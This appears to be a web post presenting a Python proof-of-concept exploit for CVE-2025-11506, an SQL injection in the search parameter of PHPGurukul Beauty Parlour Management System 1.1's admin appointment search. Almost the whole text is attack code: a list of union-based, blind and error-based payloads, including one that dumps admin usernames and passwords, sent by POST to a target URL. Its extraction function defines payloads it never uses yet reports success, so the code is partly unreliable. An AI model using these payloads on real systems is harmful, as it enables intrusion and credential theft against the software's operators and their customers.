CVE-2025-11506：PHPGurukul美容院管理系统SQL注入漏洞

# CVE-2025-11506 PoC - SQL Injection in PHPGurukul Beauty Parlour Management System 1.1 # Vulnerable file: /admin/search-appointment.php # Vulnerable parameter: searchdata import requests # Target configuration TARGET_URL = "http://target.com/admin/search-appointment.php" # SQL Injection payloads def exploit_sqli(target_url): """ Exploit SQL injection vulnerability in searchdata parameter """ # Basic SQL injection test payloads = [ # Test for basic SQL injection "' OR '1'='1", "' OR '1'='1' -- ", "' OR '1'='1' #", # Union-based injection to extract database version "' UNION SELECT 1,version(),3,4,5-- ", # Union-based injection to extract current database "' UNION SELECT 1,database(),3,4,5-- ", # Union-based injection to extract table names "' UNION SELECT 1,group_concat(table_name),3,4,5 FROM information_schema.tables WHERE table_schema=database()-- ", # Union-based injection to extract user credentials "' UNION SELECT 1,group_concat(username,0x3a,password),3,4,5 FROM tbladmin-- ", # Time-based blind injection "' OR SLEEP(5)-- ", "1' AND (SELECT SLEEP(5))-- ", # Boolean-based blind injection "' AND 1=1-- ", "' AND 1=2-- ", # Error-based injection "' AND extractvalue(1,concat(0x7e,version()))-- ", "' AND updatexml(1,concat(0x7e,database()),1)-- ", ] for payload in payloads: try: # Send POST request with malicious payload data = { "searchdata": payload } response = requests.post(target_url, data=data, timeout=10) # Check for successful injection indicators if response.status_code == 200: # Check response for database information leakage if any(keyword in response.text.lower() for keyword in ["mysql", "version", "root", "admin", "password", "tbladmin"]): print(f"[+] Successful injection with payload: {payload}") print(f"[+] Response snippet: {response.text[:500]}") return True, payload, response.text except Exception as e: print(f"[-] Error with payload {payload}: {e}") return False, None, None def extract_data(target_url): """ Extract sensitive data from database using SQL injection """ # Extract database name db_payload = "' UNION SELECT 1,database(),3,4,5-- " # Extract all tables tables_payload = "' UNION SELECT 1,group_concat(table_name SEPARATOR ','),3,4,5 FROM information_schema.tables WHERE table_schema=database()-- " # Extract admin credentials admin_payload = "' UNION SELECT 1,group_concat(username,0x3a,password),3,4,5 FROM tbladmin-- " print("[*] Starting SQL injection exploitation...") success, payload, response = exploit_sqli(TARGET_URL) if success: print("[+] Database extraction completed successfully") else: print("[-] Exploitation failed or target not vulnerable") if __name__ == "__main__": extract_data(TARGET_URL)